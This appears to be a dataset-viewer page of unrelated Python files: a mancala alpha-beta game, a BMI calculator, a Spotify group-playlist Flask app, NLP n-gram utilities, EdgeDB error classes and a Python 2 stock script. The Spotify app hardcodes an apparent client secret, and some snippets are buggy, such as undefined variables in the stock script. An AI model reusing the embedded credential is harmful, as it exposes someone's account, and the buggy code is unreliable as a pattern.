if self.grainesRestantesJoueur(adversaire) == 0:
coupesAdmissibles = self.coupesAdmissiblesNourrir(joueur)
#si aucun coup ne peut être joué pour nourrir l'adversaire
if len(coupesAdmissibles)==0:
self.scores[joueur] += self.grainesRestantes()
self.plateau = np.zeros(2*self.nCoupes,dtype=int)
self.finie = True
#partie terminée
#sinon toutes les coupes non vides sont admissibles
else :
coupesAdmissibles = [(k+joueur*self.nCoupes) for k in range(self.nCoupes) if self.plateau[(k+joueur*self.nCoupes)]>0]
return coupesAdmissibles
def tourDuJoueur(self):
joueur = 0
#si l'adversaire n'a plus de graines, il faut obligatoirement le nourrir
coupesAdmissibles = self.coupesAdmissibles(joueur)
print("C'est au tour du joueur 1. Entrez le numéro de la coupelle à jouer:")
nCoupe = int(input())
#print("coupesAdmissibles",coupesAdmissibles)
while nCoupe<0 or nCoupe>self.nCoupes-1 or (not (nCoupe in coupesAdmissibles)):
#cas où la coupelle n'existe pas, ou correspond à un coup non admissible
print("Coupelle incorrecte. Entrez le numéro de la coupelle à jouer.")
nCoupe = int(input())
self.deplacer(joueur,nCoupe)
self.jouer()
def tourOrdi(self):
joueur = 1
self.profondeur = 0
self.value = self.alphabeta(joueur,-np.inf,np.inf)
for idCoupe in self.arbreFils.keys():
print("coupe = ",idCoupe," : valeur = ",self.arbreFils[idCoupe].value)
for idCoupe in self.arbreFils.keys():
if self.value==self.arbreFils[idCoupe].value:
self.deplacer(joueur,idCoupe)
break
self.jouer()
def partieFinie(self):
#True si le plateau ne contient plus aucune graine
limiteGagne = self.nCoupes*self.nGrainesParCoupelleInit
self.finie = (self.grainesRestantes()==0 or self.scores[0]> limiteGagne or self.scores[1]> limiteGagne)
return self.finie
def afficherPlateau(self):
print(np.array([self.plateau[self.nCoupes:len(self.plateau)][::-1],self.plateau[0:self.nCoupes]])) # [::-1] permet d'inverse la liste
def afficherScores(self):
print("score J1........."+str(self.scores[0]))
print("score MinMax....."+str(self.scores[1]))
def evaluation(self,joueur):
adversaire = (joueur+1)%2
return self.scores[joueur]-self.scores[adversaire]
#Fonction principale
def jouer(self):
if (not self.partieFinie()) :
self.afficherPlateau()
self.afficherScores()
if (self.tour==0):
self.tourDuJoueur()
else:
self.tourOrdi()
print("\n")
else:
self.afficherPlateau()
self.afficherScores()
print("Partie Finie !")
#plus vraiment utile, le code du minimax est repris dans celui de la fonction alphabeta
def minimax(self, joueurMaximisant, profondeurArbre=1): #joueurMaximisant = joueur pour lequel on veut maximiser le score (0 ou 1)
#On simule ici des situations fictives de jeu de manière récursive (l'I.A. lit en quelque sorte l'avenir pour n=profondeur tours en avance)
self.arbreFils = {}
#on détermine les coups possibles
#si aucun coup n'est possible cette fonction arrête aussi la partie
coupesPossibles = self.coupesAdmissibles(self.tour)
if (self.profondeur == self.profondeurMinimax or self.finie): #cas de base
self.value = self.evaluation(joueurMaximisant)
return self.value
if self.tour==joueurMaximisant:
fctComparaison = max
self.value = - np.inf
else:
fctComparaison = min
self.value = np.inf
#on parcourt tous les coups possibles
for idCoupe in coupesPossibles:
fils=self.clone()
fils.profondeur=self.profondeur+1
fils.deplacer(fils.tour,idCoupe)
fils.value = fils.minimax(joueurMaximisant)
#on ne remplit effectivement l'arbre (attribut arbreFils)
#que pour une profondeur < à profondeurArbre
#on pourrait même ne pas le remplir du tout mais profondeurArbre = 1
#permet d'afficher les valeurs associées à chaque coup...
if (self.profondeur < profondeurArbre):
self.arbreFils[idCoupe]=fils
self.value = fctComparaison(self.value, fils.value)
return self.value
def alphabeta(self, joueurMaximisant, alpha, beta, profondeurArbre=1): #joueurMaximisant = joueur pour lequel on veut maximiser le score (0 ou 1)
#On simule ici des situations fictives de jeu de manière récursive (l'I.A. lit en quelque sorte l'avenir pour n=profondeur tours en avance)
self.arbreFils = {}
#on détermine les coups possibles
#si aucun coup n'est possible cette fonction arrête aussi la partie
coupesPossibles = self.coupesAdmissibles(self.tour)
if (self.profondeur == self.profondeurMinimax or self.finie): #cas de base
self.value = self.evaluation(joueurMaximisant)
return self.value
if self.tour==joueurMaximisant:
fctComparaison = max
self.value = - np.inf
else:
fctComparaison = min
self.value = np.inf
#on parcourt tous les coups possibles
for idCoupe in coupesPossibles:
fils=self.clone()
fils.profondeur=self.profondeur+1
fils.deplacer(fils.tour,idCoupe)
fils.value = fils.alphabeta(joueurMaximisant,alpha,beta)
#on ne remplit effectivement l'arbre (attribut arbreFils)
#que pour une profondeur < à profondeurArbre
#on pourrait même ne pas le remplir du tout mais profondeurArbre = 1
#permet d'afficher les valeurs associées à chaque coup...
if (self.profondeur < profondeurArbre):
self.arbreFils[idCoupe]=fils
self.value = fctComparaison(self.value, fils.value)
#coupures alpha et beta si on est sûrs d'avoir le meilleur résultat possible
if self.tour==joueurMaximisant:
if self.value >= beta:
return self.value
alpha = fctComparaison(alpha,self.value)
else:
if alpha >= self.value:
return self.value
beta = fctComparaison(beta,self.value)
return self.value
t = terrainDeJeu(nCoupes=6,nGrainesParCoupelle=4,profondeur=8)
t.jouer() |
9,593 | 8b009451e9f65ef12e5db1321a9d5347ef7fd756 | # aylat
# This program will calculate an individual's body mass index (BMI),
# based on their height and their weight
# Prompt user to input information
Name = input('Enter your full name: ')
Weight = float(input('Enter your weight in pounds: '))
Height = float(input('Enter your height in inches: '))
# Perform BMI calculation, based on user input
BMI = Weight * 703 / Height**2
# Use an if/elif structure to determine the user's weight category, based on BMI
print('\n')
if BMI < 18.5:
print(Name, ", your BMI calculation is ", format(BMI, '.1f'),
", which indicates your weight category is underweight.", sep='')
elif BMI < 24.9:
print(Name, ", your BMI calculation is ", format(BMI, '.1f'),
", which indicates your weight category is ideal.", sep='')
elif BMI < 29.9:
print(Name, ", your BMI calculation is ", format(BMI, '.1f'),
", which indicates your weight category is overweight.", sep='')
else:
print(Name, ", your BMI calculation is ", format(BMI, '.1f'),
", which indicates your weight category is obese.", sep='')
|
9,594 | 3c03f71ef9de8825ecd7c89208c79f43c9fb7a56 | """
Python Challenge - Level 1 - What about making trans?
"""
import string
#import requests
#res = requests.get('http://www.pythonchallenge.com/pc/def/map.html')
#res.raise_for_status()
#print(res.text)
INPUT_TEXT = string.ascii_lowercase # abcdefghijklmnopqrstuvwxyz
OUTPUT_TEXT = INPUT_TEXT[2:]+INPUT_TEXT[:2] # cdefghijklmnopqrstuvwxyzab
TRANSLATION_TABLE = str.maketrans(INPUT_TEXT, OUTPUT_TEXT)
CYPHER_TEXT = """g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr \
amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw \
rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu \
ynnjw ml rfc spj."""
#print(CYPHER_TEXT.translate(TRANSLATION_TABLE))
# The encrypted text told us to apply the same translation to the url
#print('map'.translate(TRANSLATION_TABLE)) # solution here
# Success, let's print out the next level url
print('http://www.pythonchallenge.com/pc/def/ocr.html')
|
9,595 | 4f674b30c919c7ec72c11a8edd9692c91da7cb90 | import json
import spotipy
import spotipy.util as util
from spotipy.oauth2 import SpotifyClientCredentials
from flask import abort, Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from helpers import login_required
# Configure application
app = Flask(__name__)
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'
# Ensure responses aren't cached
if app.config["DEBUG"]:
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# list of track ids gathered from users
tracks = []
# retrieve top tracks from newly connected user
@app.route("/tracks", methods = ["POST"])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
# Main page. Runs playlist generation and displays the embedded playlist.
@app.route("/")
@login_required
def index():
username = session["username"]
# host has already logged in and playlist is already made
if session.get("token") and session.get("playlist_dict"):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session["token"])
playlist = sp.user_playlist_add_tracks(username, session["playlist_dict"]['id'], group_playlist) # add to the playlist
return render_template("index.html", playlist_url=session["playlist_dict"]['uri'])
token = util.prompt_for_user_token(username,'playlist-modify-public user-top-read', client_id=client_id,client_secret=client_secret,redirect_uri='http://127.0.0.1')
if token:
session["token"] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0, time_range='medium_term') # get the hosts top tracks
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, "Group Playlist")
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id, group_playlist) # playlist is now populated
else:
print("Can't get token for " + username)
url = "https://open.spotify.com/embed?uri=" + playlist_dict['uri']
session["playlist_url"] = playlist_dict['uri']
return render_template("index.html", playlist_url=url)
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
tracks = []
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if request.form.get("username"):
session["username"] = request.form.get("username")
return redirect("/")
else:
return render_template("login.html")
# Returns a score of how similar two songs are. The lower the score, the lesser the differences.
def compare_score(song, total_features, features):
score=0.0
for key, value in features[0].items():
if isinstance(value, float):
score+=(value*1.0)/((1.0)*(total_features[key]+value))
return score
# Generates and intelligent playlist
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id, client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features={"danceability":0.0, "energy":0.0, "key":0.0, "loudness":0.0, "mode":0.0, "speechiness":0.0, "acousticness":0.0, "instrumentalness":0.0, "liveness":0.0, "valence":0.0, "tempo":0.0}
song_counter=0.0
# Aggregating song features
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
# Averaging out the songs features
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
# now we find all the songs close enough to the "average"
song_list=[]
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key = lambda x: x[1])
# Getting the first 20 closest, best songs.
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
|
9,596 | 367c3b4da38623e78f2853f9d3464a414ad049c2 | '''
Utility functions to do get frequencies of n-grams
Author: Jesus I. Ramirez Franco
December 2018
'''
import nltk
import pandas as pd
from nltk.stem.snowball import SnowballStemmer
from pycorenlp import StanfordCoreNLP
import math
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
import string
nlp = StanfordCoreNLP('http://localhost:9000/')
pos_not_included = ['CC', 'CD', 'DT', 'FW', 'IN', 'LS', 'PP', 'PP$', 'WP', 'WP$', 'WRB', 'WDT', '#', '$', '“', '``', '(', ')', ',', ':']
pos_not_included_1 = ['NN', 'NNS','NP', 'NPS','CC', 'CD', 'DT', 'FW', 'IN', 'LS', 'PP', 'PP$', 'WP', 'WP$', 'WRB', 'WDT', '#', '$', '“', '``', '(', ')', ',', ':']
stemmer = SnowballStemmer("english")
#regex_tokenizer = RegexpTokenizer(r'\w+') # Tokenizer that removes punctuation
def clean_doc(text, language='english'):
'''
Removes unknown characters and punctuation, change capital to lower letters and remove
stop words. If stem=False
Inputs:
sentence (string): a sting to be cleaned
Returns: a string
'''
#tokens = regex_tokenizer.tokenize(text)
tokens = nltk.word_tokenize(text)
tokens = [t.lower() for t in tokens]
tokens = [t for t in tokens if t not in stopwords.words(language)+[p for p in string.punctuation]]
return ' '.join(tokens)
def csv_as_text(file_name):
'''
Opens a csv file with sentences and creates a string
Inputs:
- file_name (str): name of the file to open
Returns a string
'''
try:
df = pd.read_csv(file_name)
texts_list = set(list(df['0']))
return ' '.join(texts_list)
except:
pass
def gettin_all_text(list_of_files):
'''
Opens all csv files with sentences and returns a corpus
Inputs:
-list_of_files (list): a list with the names of the files to open
Returns a string
'''
all_text = [csv_as_text(file) for file in list_of_files]
all_text = [text for text in all_text if type(text) == str]
all_str = ' '.join(all_text)
return all_str
def all_text_list(list_of_files):
'''
Opens all csv files with sentences and returns a list of texts
Inputs:
-list_of_files (list): a list with the names of the files to open
Returns a list
'''
all_text = [csv_as_text(file) for file in list_of_files]
all_text = [text for text in all_text if type(text) == str]
return all_text
def pos_filter(list_of_texts, filter_list=pos_not_included):
'''
Removes the words identified with the Part of Speech included
in the filter list, from every text in the list of texts.
Inputs:
- list_of_texts (list of strings): list with the texts to be analyzed
- filter_list (list of strings): list with part of speech to eliminate
Returns a list of cleaned texts
'''
filtered_texts = []
for text in list_of_texts:
pos = nlp.annotate(text, properties={'annotators': 'pos', 'outputFormat': 'json'})['sentences'][0]['tokens']
filtered_words = [stemmer.stem(token['word']) for token in pos if token['pos'] not in filter_list]
filtered_str = ' '.join(filtered_words)
filtered_texts.append(filtered_str)
return filtered_texts
def pos_filter_text(text, filter_list=pos_not_included):
'''
Removes the words identified with the Part of Speech included
in the filter list, from a given text.
Inputs:
- text (str): text to be analyzed
- filter_list (list of strings): list with part of speech to eliminate
Returns a cleaned text
'''
text_list = make_chunks(text)
temp = []
for t in text_list:
pos = nlp.annotate(t, properties={'annotators': 'pos', 'outputFormat': 'json'})['sentences'][0]['tokens']
filtered_words = [stemmer.stem(token['word']) for token in pos if token['pos'] not in filter_list]
filtered_str = ' '.join(filtered_words)
temp.append(filtered_str)
final_text = ' '.join(temp)
return final_text
def pos_filter_corpus(corpus):
'''
Removes the words identified with the Part of Speech included
in the filter list, from every text in the corpus.
Inputs:
- corpus (dict): Dictionary where every key is an starting link and
and every valu is a text associated with the starting link.
Returns a dictionary with the cleaned texts.
'''
results = {}
for k, v in corpus.items():
results[k] = pos_filter_text(v)
return results
def make_chunks(text, max_size=95000):
'''
Creates chunks of text with lenght less than or equal to the
defined maximum size, from an original text.
Inputs:
- text (str):
- max_size (int):
Returns a list of chunks
'''
tokens = nltk.word_tokenize(text)
chunks = []
chunk = []
count = 0
for word in tokens:
if count < max_size-len(word):
chunk.append(word)
count += len(word)+1
else:
chunks.append(' '.join(chunk))
count = len(word)
chunk = []
chunk.append(word)
chunks.append(' '.join(chunk))
return chunks
def tokens_freq(corpus, size):
'''
Computes the frequency of n-grams according to size and
retuns an ordered data frame.
Inputs:
corpus (string): text to be analized
size (int): size of n-grams
Returns: a data frame
'''
tokens = nltk.word_tokenize(corpus)
frequencies = {}
complete = tokens + tokens[:size - 1]
n_grams = []
for i in range(len(tokens)):
l = i
h = i + size-1
n_grams.append(', '.join(complete[l:h+1]))
for ng in n_grams:
if ng not in frequencies.keys():
frequencies[ng] = 1
else:
frequencies[ng] += 1
freq_list = [(k, v) for k, v in frequencies.items()]
df = pd.DataFrame(freq_list, columns=[str(size)+'-gram', 'Frequency'])
return df.sort_values(by='Frequency', ascending=False)[:20]
|
9,597 | 164167590051fac3f3fd80c5ed82621ba55c4cc4 | from arnold import config
class TestMicrophone:
def setup_method(self, method):
self.config = config.SENSOR['microphone']
def test_config(self):
required_config = [
'card_number', 'device_index', 'sample_rate', 'phrase_time_limit',
'energy_threshold'
]
for config_key in required_config:
assert config_key in self.config
def test_listen(self):
# TODO: Figure out how to mock this
pass
def test_recognise_command(self):
# TODO: Figure out how to mock this
pass
|
9,598 | b694c834555843cc31617c944fa873f15be2b9c5 | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from . import _base
from ._base import * # NOQA
class InternalError(_base.EdgeDBError):
code = 'XX000'
class EdgeDBBackendError(InternalError):
code = 'XX001'
class IntegrityConstraintViolationError(_base.EdgeDBError):
code = '23000'
class MissingRequiredPointerError(IntegrityConstraintViolationError):
code = '23502'
def __init__(self, msg, *, source_name=None, pointer_name=None):
super().__init__(msg)
self._attrs['s'] = source_name
self._attrs['p'] = pointer_name
class InvalidPointerTargetError(IntegrityConstraintViolationError):
code = '23503'
def __init__(self, msg):
super().__init__(msg)
class ConstraintViolationError(IntegrityConstraintViolationError):
code = '23514'
class PointerCardinalityViolationError(IntegrityConstraintViolationError):
code = '23600'
class EdgeDBSyntaxError(_base.EdgeDBError):
code = '42600'
class InvalidTransactionStateError(_base.EdgeDBError):
code = '25000'
class NoActiveTransactionError(InvalidTransactionStateError):
code = '25P01'
|
9,599 | 07854dc9e0a863834b8e671d29d5f407cdd1c13e | import requests
import datetime
from yahoo_finance import Share
def getYahooStock(ticker, date1, date2):
companyData = Share(ticker)
dataList = companyData.get_historical(date1, date2)
endData = dataList[0];
startData = dataList[len(dataList) - 1];
print ticker, float(startData['Open']), float(endData['Open'])
return ticker, float(startData['Open']), float(endData['Open'])
def stockDrop(ticker, date1):
currentDate = datetime.datetime.now()
formattedDate = (str(currentDate.year) + '-' + str(currentDate.month) + '-' + str(currentDate.day))
companyData = Share(ticker)
dataList = companyData.get_historical(date1, formattedDate);
originalStock = float(dataList[len(dataList) - 1]['Open']);
nextLower = 0
days = -1
for index, i in enumerate(reversed(dataList)):
nextLower = i['Open']
if float(nextLower) < float(originalStock):
days = len(dataList) - index
break
print days, originalStock, nextLower
return days, originalStock, nextLower
#def stockRange(ticker, date, range):
# dateRange = datetime.datetime()
def buyStock(ticker, buyDate, sellDate, amount):
data = getYahooStock(ticker, buyDate, sellDate)
print (amount * data[2])/data[1]
return (amount * data[2])/data[1]
start_date = datetime.datetime(2017, 4, 7, 0)
end_date = datetime.datetime(2017, 4, 14, 0)
d = start_date
delta = datetime.timedelta(hours=1)
print delta
companyData = Share('UAL')
dataList = companyData.get_historical(date1, date2)
while d <= end_date:
print getYahooStock
print d.strftime("%Y-%m-%d %H")
d += delta
stockDrop("BP", '2016-03-29')
getYahooStock("WFC", '2016-03-29', '2017-03-29')
buyStock("WFC", '2016-03-29', '2017-03-29', 1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.